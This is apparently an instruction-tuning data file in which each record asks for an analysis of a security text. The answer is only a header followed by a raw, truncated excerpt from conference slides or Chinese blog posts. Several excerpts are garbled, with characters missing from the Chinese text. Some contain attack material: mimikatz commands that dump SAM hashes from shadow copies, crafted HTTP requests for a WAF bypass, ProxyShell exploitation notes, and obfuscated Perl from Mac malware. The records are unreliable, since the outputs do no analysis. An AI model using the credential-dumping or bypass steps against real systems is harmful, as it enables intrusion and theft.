{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInsecure.Org Insecure.Org Mastering the Nmap Scripting Engine by Fyodor and David Fifield http://insecure.org/presentations/BHDC10/ Black Hat Briefings Las Vegas July 28; 4:45 PM; Augustus 5+6 Defcon 18 July 30; 5:00 PM; Track One Insecure.Org Insecure.Org Abstract Most hackers can use Nmap for simple port scanning and OS detection, but the Nmap Scripting Engine (NSE) takes scanning to a whole new level. Nmap's high-speed networking engine can now spider web sites for SQL injection vulnerabilities, brute-force crack and query MSRPC services, find open proxies, and more. Nmap includes more than 125 NSE scripts for network discovery, vulnerability detection, exploitation, and authentication cracking. Rather than give a dry overview of NSE, Fyodor and Nmap co- maintainer David Fifield demonstrate practical solutions to common problems. They have scanned millions of hosts with NSE and will discuss vulnerabilities found on enterprise networks and how Nmap can be used to quickly detect those problems on your own systems. Then they demonstrate how easy it is to write custom NSE scripts to meet the needs of your network. Finally they take a quick look at recent Nmap developments and provide a preview of what is soon to come. This presentation does not require any NSE experience, but it wouldn't hurt to read http://nmap.org/book/nse.html. Insecure.Org Insecure.Org Resources These slides are just a teaser. Final slides will be posted by August 1, 2010 to http://insecure.org/presentations/BHDC10/. Our goal is to make this presentation useful, informative, and entertaining even to those who know very little about Nmap and the Nmap Scripting Engine. But you can get the most out of this presentation by first reading about (and trying!) Nmap at http://nmap.org and the Nmap Scripting Engine at http://nmap.org/book/nse.html. Insecure.Org Insecure.Org Nmap Scripting Engine http://nmap.org/nsedoc/ # nmap -T4 -A scanme.nmap.org Starting Nmap 5.30BETA1 ( http://nmap.org ) Nmap scan repo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Copyright  2011 Juniper Networks, Inc. www.juniper.net AppSecure Brad Woodberg, Juniper Networks bwoodberg@juniper.net twitter: @bradmatic517 Defcon 2011 Network Application Firewalls: Exploits and Defense 2 Copyright  2011 Juniper Networks, Inc. www.juniper.net AGENDA Discussion  Beyond Layer 4  App-FW Explained  Can Do / Cant Do, Vulnerabilities and Limitations  Exploitation in Action  Getting it Right Key Issues  Application Firewalling does not replace traditional security mechanisms like stateful firewall and full IPS  Application Firewalling has limitations even when properly implemented, there are also a number of potential network pitfalls.  How to properly deploy this technology in conjunction with traditional security mechanisms. 3 Copyright  2011 Juniper Networks, Inc. www.juniper.net HTTP/1.1 200 OK Content-Type: text/html Server: Apache Date: Wed, 09 Feb 2011 Cache-Control, private <malicious javascript, aurora exploit, shellcode> EVOLUTION Client: 1.1.1.1 Server: 2.2.2.2 Src-IP: 2.2.2.2, Dest-IP: 1.1.1,1, Src-Port 80, Dest-Port 2481, Protocol TCP, (SYN/ACK) Src-IP: 2.2.2.2, Dest-IP: 1.1.1,1, Src-Port 80, Dest-Port 2481, Protocol TCP, (ACK) Stateful Firewall Application Firewall Full IPS GET /index.html HTTP /1.0 Host: www.google.com User-Agent: Mozilla/5.0 Accept: text/html Accept-Language: en-us Accept-Encoding Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1 Keep-Alive: 115 Connections: keep-alive Access List 4 Copyright  2011 Juniper Networks, Inc. www.juniper.net WHATS NEW? 1. Application Identification (AppID) goes beyond traditional stateful firewalls by inspecting some Layer 7 payload to identify the application. 2. AppID does not inspect the entire session like full IPS, and only identifies the application, not other activity like exploits. 3. AppID has actually be around for a long time in numerous technologies, but was not typically a user controlled feature. 5 Copyright  2011 Juniper Networks, Inc. www.juniper.net APPID PATTERN MAT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 ASP.NET下的内存Route内存的N种写法 前 System.Web.Routing Route内存 实现RouteBase GetRouteData GetVirtualPath 优先级 利System.Web.Routing.Route 注RouteHandler 注HttpHandler 路由问题 添加到第位 测试 参考 @yzddmr6 asp.net下的内存研究章较少前提到过的包括虚拟路径内存以及HttpListener内存最近 研究了下其他类型的内存发现.net可以利的地要多得多所以准备写个系列章讲讲 asp.net下的内存 章仅作研究性质不保证任何实战效果请勿于法途 上篇讲了asp.net mvc下的filter内存必须依赖于system.web.mvc.dll这个东也就是只能在.net mvc下使那么如何仅利.net framework的dll来实现新的内存呢这就引出了今天讲的route 内存 System.Web.Routing这个类最早出现在.net 3.5主要于在 ASP.NET 应程序中处理路由 前 System.Web.Routing 2 微软档介绍 如果我们能够动态打进去个路由然后映射到我们定义的类即可实现内存的效果 那么如何添加呢我们上篇章看到了在mvc中是存在个GlobalFilters.Filters来存放filter第个 RouteTable.Routes便是存放全局route的collection 这提嘴为啥不能直接mvc下的RouteConfig.RegisterRoutes来注册route 点进函数可以看到调了System.Web.Mvc.RouteCollectionExtensions.MapRoute法这个法 也是要依赖System.Web.Mvc.dll的所以不能直接拿来 Route内存 C++ 复制代码 Route类使你可以指定如何在 ASP.NET 应程序中处理路由 你 Route 为要映射到的每个 URL 模式创建个对象该对象可以处理与该模式对应的请求 然后将路由添加到 Routes 集合 当 应程序收到请求时ASP.NET 路由会循环访问集合中的路由 Routes 以查找第个与 URL 模 式匹配的路由 将 Url 属性设置为 URL 模式 URL 模式由传 HTTP 请求中的应程序名称后的段组成 例如在 URL 中 http://www.contoso.com/products/show/beverages 模式适于 products/show/beverages  具有三个段如的模式 {controller}/{action}/{id} 与 URL 匹配 http://www.contoso.com/products/show/beverages  每个段均由 / 字符分 隔 当段括在括号中 ({ 和 }) 时段会被称为 URL 参数 ASP.NET 路由从请求中检索值并 将其分配给 URL 参数 在上的示例中将为 URL 参数 action 分配值 show  如果段未括 在括号中则该值将被视为本值 将 Defaults 属性设置为个 RouteValueDictionary 对象该对象包含在 url 缺少参数时 使的值或者设置未在 url 中参数化的其他值 将 Constraints 属性设置为 RouteValueDictionary 包含正则表达式或对象的值的对象 IRouteConstraint  这些值于 确定参数值是否有效 1 2 3 4 5 C++ 复制代码 public class MvcApplication : System.Web.HttpApplication { protected void Application_Start() { AreaRegistration.RegisterAllAreas(); FilterConfig.RegisterGlobalFilters(GlobalFilters.Filters); RouteConfig.RegisterRoutes(RouteTable.Routes); BundleConfig.RegisterBundles(BundleTable.Bundles); } } 1 2 3 4 5 6 7 8 9 10 3 路寻找重载发现实际上就是给RouteTable.Routes增加了个元素我们直接调route.Add即 可 System.Web.Routing.RouteCollection.Add第个参数是名字不过没有太处只是为了判断map 有没有重复的第个参数是重点要打进去个RouteBase类型的itemRouteBase是个抽象 类默认的实现为System.Web.Rou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nArt of the possible Christopher Cleary ccleary266@gmail.com Plans are nothing; planning is everything. - Dwight D. Eisenhower (1890-1969) 1 Clash of civilizations Invincibility lies in the defense; the possibility of victory in the attack. - Sun Tzu DEFCON 19 How did I get here and what did I learn along the way 3 One of these things is not like the other Strategy without tactics is the slowest route to victory. Tactics without strategy is the noise before defeat. - Sun Tzu These two are closer than we think Every citizen should be a soldier. This was the case with the Greeks and Romans, and must be that of every free state. -Thomas Jefferson spectrum of conflict Increasing Violence Insurgency Unstable Peace Stable Peace General War Peacetime Military Engagement Limited Intervention Major Combat Operations Peace Operations Irregular Warfare  Training and Exercises  Recovery Operations  Arms Control  Counter Drug  NEO Ops  Strike, Raid  Show of Force  Sanction Enforcement  Peacekeeping  Peace Building  Peacemaking  Conflict Prevention  Support to Insurgency  Counterinsurgency  Combating Terrorism  Unconventional Warfare  Named Operations  Significant offensive and defensive operations Operational Themes Elements of Full Spectrum Operations Offensive Operations Primary Tasks  Movement to Contact  Attack  Exploitation  Pursuit Purposes  Isolate, Disrupt, Destroy  Seize key terrain  Deprive enemy of resources  Deceive and divert enemy Stability Operations Primary Tasks  Civil Security  Civil Control  Support to Governance  Support to Infrastructure Development Purposes  Provide a Secure Environment  Meet the Critical Needs of the Populace  Gain Support for the Host-Nation  Shape the Environment for Success Defensive Operations Primary Tasks  Mobile Defense  Area Defense (Static)  Retrograde Purposes  Deter or Defeat Offensive Operations  Gain Time  Achieve Economy of Force  Protect a Populace, Critical Assets and Infrastructure Civil Support Operations Primary Tasks  Ci", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPCI 2.0: Still Compromising Controls and Compromising Security PCI? At DefCon? Again? Use the hashtag #DefconPCI to rant on the Twitterz during this talk. We damn sure will! Use @defconPCIpanel for comments or Twitter-heckling Who are we?  Dave Shackleford @daveshackleford  Joshua Corman @joshcorman  James Arlen @myrcurial  Jack Daniel @jack_daniel  Alex Hutton @alexhutton  Martin McKeay @mckeay Usual disclaimers  We do not speak for our employers, clients or customers. Nor for our spouses, siblings, or offspring. But my dog will back me up.  Our opinions are our own, the facts are as we see them.  We arent lawyersetc.  These QSAs are not your QSAs. Déjà vu all over again Déjà vu all over again Last year  PCI 2.0 was new.  PCI 2.0 was fresh.  PCI 2.0 was just as frustrating as PCI 1.x.  PCI 2.0 was still lacking in concrete guidance on a LOT of things:  Mobile devices  Virtualization  Sowhere the hell are we now? The Good Becoming Compliant is not easy So what? Does Compliance affect secure at all? We dont know how to measure secure so the best we can look at is the frequency & characteristics of incidents, and compare those to PCI. How difficult and targeted were the attacks? The Bad The Bad Sometimes people cheat The Ugly Is History Doomed to Repeat Itself?  We are doing the same %&$# as a decade ago.  Firewalls.  SSL.  Patches (maybe).  Crypto (sort of).  Can a WAF save us all!?  Ahem. The Ugly The Solution(s)?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n分享一下WAF Bypass 一个小的tips 本文通过php 源码来理解 bypass waf 绕过原理 一段PHP代码 绕过一 boundary获取方式 首先看看Content-Type 是怎么获取的到 Content-Type: multipart/form-data; boundary=aa https://github.com/php/php-src/blob/90b7bde61507cee1c6b37f153909d72f5b203b8c/main/rfc18 67.c 首先从Content-Type 获取boundary 然后拿等号后面的值做boundary 的值那么绕过如下 <?php var_dump($_POST); var_dump($_FILES); ?> boundary = strstr(content_type_dup, \"boundary\"); if (!boundary) { int content_type_len = (int)strlen(content_type_dup); char *content_type_lcase = estrndup(content_type_dup, content_type_len); zend_str_tolower(content_type_lcase, content_type_len); boundary = strstr(content_type_lcase, \"boundary\"); if (boundary) { boundary = content_type_dup + (boundary - content_type_lcase); } efree(content_type_lcase); } if (!boundary || !(boundary = strchr(boundary, '='))) { sapi_module.sapi_error(E_WARNING, \"Missing boundary in multipart/form- data POST data\"); return; } POST /upload/upload.php HTTP/1.1 Host: 192.168.1.72 Content-Length: 175 Content-Type: multipart/form-data; boundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundary boundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundary boundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundary boundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundary=222 3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Connection: close 伪造一下application/x-www-form-urlencoded --222 Content-Disposition: form-data; name=\"file\"; filename=\"111.png\" Content-Type: image/png 1 --222 Content-Disposition: form-data; name=\"submit\" Submit --222-- POST /upload/upload.php HTTP/1.1 Host: 192.168.1.72 Content-Length: 175 Content-Type: Multipart/form-data boundaryboundaryboundarybounda application/x-www-form-urlencoded ryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundaryboundarybounda ryboundaryboundaryboundaryboundaryboundaryboundaryboundarybound", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents New Memory Forensics Techniques to Defeat Device Monitoring Malware Andrew Case, Gustavo Moreira, Austin Sellers, Golden Richard #BHUSA @BlackHatEvents Information Classification: General Motivation  Malware that is capable of monitoring hardware devices (keyboards, microphones, web cameras, etc.) is now commonly deployed against human targets  This type of malware poses a serious threat to privacy and security  Existing memory forensic algorithms against this type of malware are outdated, incomplete, or non-existent #BHUSA @BlackHatEvents Information Classification: General Research Goals  For the major operating systems (Windows, Linux, macOS): 1. Study the methods used by userland (process) malware to monitor hardware devices 2. Research (source code review, binary analysis) how the abused APIs are implemented 3. Determine if current memory forensics tools could detect each abuse 4. For ones not currently detected, develop capabilities to automatically detect the abuse #BHUSA @BlackHatEvents Information Classification: General Why Memory Forensics is Needed  Across platforms, memory-only payloads are often used by malware that monitors hardware devices  Disk and live forensics generally can find no traces of this malware  Volatile memory is the *only* place to determine that such malware is present and to fully investigate it #BHUSA @BlackHatEvents Information Classification: General Windows Research Setup  Focused on Windows 10  Analyzed all major builds starting with 10563 (2015) through 22000.556 (March 2022)  Developed POC software that used the APIs abused by real-world malware  Memory collection with VMware suspend states for initial work  Used Surge Collect Pro and its file collection capabilities for long term automated testing #BHUSA @BlackHatEvents Information Classification: General Windows Research - SetWindowsHookEx  Historically, the most widely abused API by userland keyloggers  Allows for registering for hooks (callbacks) fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThis Space Intentionally Left Blank 1 Executive Summary  Data in the air  Snatched by antennas  Antennas not protected  Antenna Farmers not all spooks  Data pushed from antennas to Vault  Dropped off onto classified network  Data cannot come back up from vault  Data packaged and pushed from vault to The Man  The Man wants limited reach into his clubhouse  Data becomes classified as it mingles with other packets on the networks This Space Intentionally Left Blank 2 What Goes Where? This Space Intentionally Left Blank 3 Problem  Antenna Farm administered by Engineers  Not all have a needtoknow for each apsect of project  Antennas in unsecured location  Data collects unclassified  Collector (Push) system requires integrity  System is unclassified  Must guarantee it has not been tampered with  Access to the console requires physical admittance to vault  Data scrubber requires integrity  Data scrub box is gateway to classified networks  Passes acceptable packets onto network through firewall  Logs and drops unacceptable packets This Space Intentionally Left Blank 4 Requirements  Collects need to be as realtime as possible  Must ensure that no sensitive data taints the unclass portions  Antennas, Push/Packaging system, and internal scrub box are all unclassified  Once collated with other downstream data, the collects become sensitive by association  Only data limited to the collects is allowed to enter the government network side  Did we mention no data driftback is allowed?  Government very emphatic on this point  System must provide extensive test evidence of proper performance before allowed initial run  Tedious proof of concept scenarios completed and documented This Space Intentionally Left Blank 5 Solve The Issues  Not all involved cleared for access to highest level of data  Keep uncleared and DoD personnel out of the vault  Ensure data flows in one direction only  Ensure no data tainting takes place on UNCLASSIFIED systems  Oneway fiber link between antennas/colle", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDo Not Trust the ASA, Trojans! Jacob Baines Lead Security Researcher, Rapid7 August 11, 2022 2 Introduction Adaptive Security Appliance (ASA) Original ASA ASA-X ASA-X with FirePOWER Services 3 ASAv Product Landing Page Introduction ASA Virtual Appliance (ASAv) 4 Firepower 9300 Series Firepower 1000 Series Firepower 2100 Series Firepower 4100 Series Secure Firewall 3100 Series Secure Firewall ISA3000 ASA Service Module ASA Software Landing Page Introduction Sort of ASA 5 Introduction Adaptive Security Appliance (ASA) 6 Introduction Do Not Trust the ASA 7 ASDM Product Landing Page Introduction Adaptive Security Device Manager (ASDM) 8 Request pdm.sgz pdm.sgz Admin session Load and execute SGZ contents Understanding ASDM Starting ASDM Client Overview 9 Exploiting ASDM ASDM Client Does Not Verify the Server Cert 10 Exploiting ASDM ASDM/ASA Man in the Middle 11 Exploiting ASDM Man in the Middle with mitmproxy 12 Contents of 7.18.1 SGZ - 13472 class files - 6 jars - 1 prop file - 4 properties files - 3 txt files - 1 SIGNATURE files github.com/jbaines-r7/getchoo Exploiting ASDM Whats in the SGZ? 13 Cisco ASDM RCE Vulnerability (CVE-2021-1585) Exploiting ASDM SGZ Client Logic Isnt Verified (CVE-2021-1585) 14 1. Administrator connects to attacker using the ASDM client 2. The attacker responds with a malicious SGZ file. 3. A reverse shell is established from the Administrator to the attacker Exploiting ASDM CVE-2021-1585 Exploited via Evil Endpoint 15 Exploitation - Missing SSL verification (No CVE) plus SGZ code not verified (CVE-2021-1585) - Evil endpoint or Man in the Middle CVE-2021-1585 - Disclosed in July 2021 with no patch - Failed patch in June 2022 - Remains unpatched as of July 2022 Public Exploits - staystaystay - Metasploit module github.com/jbaines-r7/cisco_asa_research/ tree/main/modules/cve_2021_1585 github.com/jbaines-r7/staystaystay Exploiting ASDM CVE-2021-1585 Exploits 16 Crafting a Malicious ASDM Package Hacker Cat Cant Get Inside Corpnet 17 Crafting a Malicious AS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHiveNightmare/SeriousSAM本地权限提升 0x00 背景介绍 微软发布一个CVE-2021-36934的问题在Twitter上有点火不长的时间github就出现了很多poc项目 我想原因是原理简单操作方便危害严重极具实用性 同时在朋友圈看见@daiker同学结合他们小伙伴对setntml和changentml的分析文章使得这个小小 的acl问题发挥出巨大价值 闲话不多说直接上操作想读原理的同学可以跳到0x02只想知道怎么操作的同学接着读 0x01 工具操作 据老外研究显示影响版本这个我没有验证 WIN 10 1809 及以上有危害 WIN 10 1803 及以下无危害 工具1mimikatz 2.2.0 20210721 Shadowcopies 查看是否有备份 使用mimikatz解出hash misc::shadowcopies lsadump::sam /system:\\\\? \\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM /sam:\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM 工具2https://github.com/GossiTheDog/HiveNightmare 0x02 原理讲解 这个CVE的原理很简单公鸡队的同学应该都是清楚windows获取本地账户hash的几种方式不清楚的 同学谷歌下主要涉及的就是SAMSECURITYSYSTEM这3个文件这三个文件都在 C:\\Windows\\System32\\config 目录下面问题就出在这3个文件的访问权限上 我们来看下ACL(access control list): 但是呢你直接去读取的时候会显示被占用0x00000020 ERROR_SHARING_VIOLATION 这个只代表被占 用不代表没权限我们需要解决的就是被占用问题因此这里通常情况下你是直接读取不了SAM等文 件的 然后这需要结合另外一个场景就是机器上存在卷影备份通过读取卷影备份中的SAM来获取hash看 到这儿你可能会觉得鸡肋实际上卷影备份的存在率相当高高到99.999%很多IT运维或者杀软等防 护软件会自动创建卷影备份防止数据丢失勒索软件等勒索软件一般会删除你的所有备份再给你加 密因此危害不小 最后真实的利用就是去查看本机有没有卷影备份有就读取响应SAMSECURITYSYSTEM文件解 出hash c:\\Windows\\System32>icacls config\\SAM config\\SAM BUILTIN\\Administrators:(I)(F) NT AUTHORITY\\SYSTEM:(I)(F) BUILTIN\\Users:(I)(RX) <-- 普通user用户也能有读取权限 APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\\所有受限制的应用程序包:(I)(RX) 已成功处理 1 个文件; 处理 0 个文件时失败 原理就这么多了很简单如果你想自己编写工具的话有个小tips 上文中的HiveNightmare工具是通过路径拼接爆破枚举的方式mimikatz作者提出使用以下2个API读 取目录文件不管是枚举还是列目录问题都不是很大 NtOpenDirectoryObject NtQueryDirectoryObject 0x03 扩展延伸 在朋友圈看见@daiker同学说微软又爆了一个普通用户读取sam注册表的bug昨天我就在琢磨着读 到hash能干嘛高版本的一般administrator是禁用的读了hash用处也不大管理员组的非 administrator用户又有remote uac限制用hash runas好像也没有现有工具不知道有api能做到 吗直到今天long716发现他之前的研究满足这个场景拿着hash把密码改了runas以后再改回来 完美提权 大致意思就是我们有了hash可以利用setntml和changentml去修改密码这其实是有一个前提就是 hash很难破解的情况下实际情况中hash的破解率的确不高因此怎么真正的提权还需要思考后续利 用 具体阅读https://mp.weixin.qq.com/s/QvdCtlWtn78FKXkwy9_CrA在这儿我就不详细秒速了 在这儿我想到了一个高频的的实际场景考虑就是你钓鱼到一台机器是普通账户权限操作各种受限 很难受如果你使用这个CVE搞到了hash就可以改个管理员权", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#Proxyshell# 个人记录 目前 proxyshell 实战中遇到最多的问题有两种一个是 powershell 端点获取问题一个是获 取 cmdlet 可执行端点后 get webshell 中间遇到的坑 一powershell 端点获取问题 目前大部分人利用 poc 时都是使用 administrator 测试是不是存在可以利用的 powershell 端 点获取不到爆破邮箱这里使用头像哥思路可花较少时间获取 ps Exhange 的权限 1. 原始 poc 浅析 https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell.py 结合最先公开的 poc(此 poc 大量参考斗象文章)中的部分点分析下它的利用链和实际遇到 的问题Poc 执行后首先获取 LegacyDN 而后获取 sid 最后生成 token获取的前提是输入的 邮箱必须是存在的邮箱否则会报五百错误 生成完毕 token 后第二个红色箭头处会停留等待输入命令需要注意的是程序运行到此处只 是生成了 token 并没有验证 token 是否具有远程权限 Shell 函数获取用户输入后才会发起认证进入函数后第一个红色箭头处 wsman 将帮助我们 发起认证格式为 Kerberos 的请求并执行命令(发起的请求还会经过 PwnServer 类处理)认 证过程中如果指定邮箱没有 Exchange Online PowerShell 权限时会报错如下 有权限将会获取输入的命令执行结果以上是原 poc 的执行流程 2. 另一新公开的 poc 分析 https://github.com/ktecv2000/ProxyShell 原理类似所以略过分析该脚本针对部分环境存在问题如果 rid 不是 500 强制修改 rid 为 500 当它打印出[Stage 3] Accessing /Powershell Endpoint 时实际此时在部分环境下不会成功 认证但此处还会打印完成认证没有写好处理逻辑问题也可能作者只打了自己搭建的 exchange 他没有发现这一问题 为了清楚的看到它是否真的通过 wsman 认证成功我们首先替换 pypsrp 库的 wsman.py 文 件为该 poc 作者自己写的 wsman.py再给它发送的 requests 请求加上代理看下究竟是什 么样的回显 执行后于 burp 看到回显如下 可以看到实际上它是根本没有验证成功查询该问题 https://windowstechpro.com/the-user-isnt-assigned-to-any-management-roles-error/ https://serverfault.com/questions/100311/how-do-i-resolve-user-isnt-assigned-to-any-managem ent-roles-error-in-exchange 大概得知是因为域管未加入 exchange Organization Management 组造成所以此脚本 及其他类似思路的 poc 或脚本只适用于目标环境恰好存在 rid500 域管在该组的情况 下否则都会失败 到这里也能解决一个迷思有个好兄弟很坚定认为说如果你都不是域管你怎么去导出 邮件给我一顿嘲讽这里我们知道域管与 exchange 管理员是分离的并没有必然 联 系  即 使 rid 为 500 域 管 理 员 也 会 失 败 所 以 根 源 问 题 应 该 是 用 户 是 不 是 在 Organization Management 组中 至于为何产生这种情况在其他类似问题的解答里看到似乎是安装 exchange 时用 户不是对应的域管造成应该是属于安装问题而其他尤其是高版本 exchange 的可 能有所更新已经避免了此问题目前真实环境中未遇到非 exchange15 的存在这个 问题 这个情况也通用于其他类似脚本原理是一样的所以部分朋友认为修改 rid500 就能 通杀所有目标环境的是完全的美好幻想 二Get shell 问题 很多环境都存在 rid500 可以打的情况其 cmdlet 命令集支持所有的命令如 certificate设置 导出权限就是直接 shell 但是实际过程中发现遇到 exchange15 的环境使用的账户拥有访问 powershell 端点的权限, 但是 cmdlet 支持不全这个用之前头像哥的思路去获取到所有成员再自行测试其是否是 管理员去打目前还未成功没能实锤这种情况究竟是版本问题还是权限问题如果后面可以 解决这个问题可能会达到通杀的效果 Ref: https://docs.microsoft.com/zh-cn/e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nR I C K Y H I L L D E F C O N 2 1 8 / 3 / 2 0 1 3 Phantom Network Surveillance UAV / Drone 1 About Me  Security Consultant, D.C. Area  Specialties: Wireless & SCADA Security  US Govt. and Commercial Engagements  Previous DEFCON talks: WarRocketing & WarBallooning, (over Las Vegas ;-)  Hobbies: R/C helis, Deep Sea Fishing 2 Outline  Intro - Aerial Wireless Surveillance  Past Attempts: Balloons, Rockets, UAVForge  New Technology: The Phantom Drone  Building the Network Surveillance Drone  Flights & Results  Conclusion 3 Whats this About?  Aerial visual and wireless (802.11) surveillance  Challenge: Personal previous attempts to capture and, more importantly to engage wireless targets from aerial platforms have been problematic:  WarRocketing limited air time, Warballooning limited directional control, weak signals  Others:  Blackhat 2011, Tassey & Perkins - WASP wireless spy drone  UAVForge, 2011 - Covert visual surveillance, No Winner 4 But I luv Helis & Drones: Why did UAVForge fail?  Factors:  Govt. required Heli operations be conducted beyond line of sight (LoS)  Limited First Person View (FPV) R/C techniques  Autonomous drone operation required, (including obstacle avoidance)  Landings Problematic: Many Crashes  Teams needed better descent & flight attitude indicators 5 UAVForge  Flight Problems 6 UAVForge  Another Flight 7 Whats New Since 2011?  Technology has improved dramatically:  Computers super tiny: Cotton Candy (30 grams)  CC is Bluetooth, HDMI, and 802.11 capable  Wifi Pineapple (Hak5): small + remotely assessable via 3G, 4G  DJI Phantom = the first consumer quality drone that is easily flyable by the average person. 8 Meet THE DJI Phantom  DJI Innovations introduced the Phantom JAN 2013  It quickly gained a reputation for being the most stable drone platform in the air today  Features:  GPS Auto-Pilot  Auto Return to Home  High payload capability: up to 400 grams  Relatively Inexpensive: $679. UAVForge Dones: $2K-9K 9 TechnoLust Overcomes Me: Lets build", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmore more embedded embedded systems systems FX of Phenoelit Las Vegas 2003 Agenda Agenda Hacking the Matrix GSM 3G Basics GPRS backbone hacks Anonymous HTTP via WAP Siemens S55 Vulnerabilities Phenoelits usual Cisco Øday vulnerability and exploit Hacking the MATRIX Hacking the MATRIX Enterasys Matrix E1 Vulnerabilities in the Matrix: SSH can only fork 10 times unfinished connections stay open TCP ISN 64k rule on switch ports OSPF neighbors added to neighbor list in state HELO HTTP Server negative content-length integer bug GSM Basics GSM Basics Global System for Mobile communications  Mobile Phone Network Authentication based on key material on SIM card and on the network GSM core network relies on caller identification via MSISDN and key material for authentication and billing Caller spoofing generally considered hard to do GSM Basics GSM Basics  GPRS GPRS General Packet Radio Service Packet oriented data transfer for mobile devices Backbone build using TCP/IP Authentication via GSM and optional PPP (CHAP,PAP) Network access, routes and IP addressing depending on Access Point Name (APN) GPRS Components GPRS Components SGSN SGSN GGSN HLR Home Location Register Internet PLMN WAP GW GPRS Attack Points GPRS Attack Points The GGSN is just another TCP/IP device facing the Internet @stake: Nokia GPRS 1 IPSO DoS with TCP Option 0xFF APN guessing (WarAPNing?) APNs often selected by company name for mobile VPNs APN filtering in HLR possible but rarely implemented APNs are not considered a secret  Backbone hacks: GTP Backbone hacks: GTP GPRS Tunneling Protocol (ETSI TS 129 060) Transports user protocols in the GPRS backbone Controls inter-network roaming Control channel and user data channel xGSN has to support all old protocol versions from 0 on Whats so cool? Whats so cool? Fully UDP based protocol No authentication Full control over all GPRS nodes Creation, update or deletion of user contexts and tunnels Rerouting, redirection and relocation control Context billing configu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHarnessing Weapons ...of Mac Destruction WHOIS @patrickwardle repurposing !detection detection OUTLINE the idea The Idea \"good hackers copy; great hackers steal\" spy \"a\" the \"lab\" } captured! (by spy \"b\") REPURPOSING MALWARE ...for personal gain spy \"b\" \"repurposed\" ...rather why not! WHY? With more resources and motivations, APT & cyber-criminal groups are (likely) going to write far better malware than you! money coders mission fully featured that will also be attributed to them! } fully tested + + ...so why not for us? WORKS FOR \"THEM\" leaked slides } \"risky\" deployments attribution from to CHALLENGES without source code! find all relevant logic understand C&C protocol patch (correctly) avoid (AV) detection analysis phase create C&C server incomplete patch EXAMPLE: FAIL $ cat fpsaud #!/usr/bin/perl use strict;use warnings;use IO::Socket;use IPC::Open2;my$l;sub G{die if!defined syswrite$l,$_[0]}sub J{my($U, $A)=('','');while($_[0]>length$U){die if! sysread$l,$A,$_[0]-length$U;$U.=$A;}return$U;} sub O{unpack'V',J 4}sub N{J O}sub H{my$U=N; $U=~s/\\\\/\\//g;$U}sub I{my$U=eval{my$C=`$_[0]` #backup c&c servers for my $B( split /a/, M('1fg7kkb1nnhokb71jrmkb;rm`;kb...') ) { push @e, map $_ . $B, split /a/, M('dql-lwslk-bdql...'); } wtf? ...backup C&C servers left intact OSX.FruitFly (repurposed) + Repurposing \"good hackers copy; great hackers steal\" choose your malware! REPURPOSING capabilities: attribution: 120+ mac malware samples! ransomware crypto-miner backdoor implant 0x00001a47 lea eax, dword [edi+4] 0x00001a4a mov esi, dword [edi+0x44] 0x00001a4d sub esp, 0xc 0x00001a50 push eax 0x00001a51 call gethostbyname 01 02 03 04 05 06 analyze specimen REPURPOSING understand protocol $ lldb malware.app (lldb) b gethostbyname (lldb) c Process stopped: gethostbyname (lldb) x/s *((char**)($esp+4)) 0x00112240: \"89.34.111.113\" 0x00112240: C&C server find remote access e.g. checkin w/ install path 0x0000848e mov dl, byte [dataFromServer] ... 0x00004125 dec dl 0x00004127 cmp dl, 0x4", "category": "text_analysis", "source": "security_papers"}
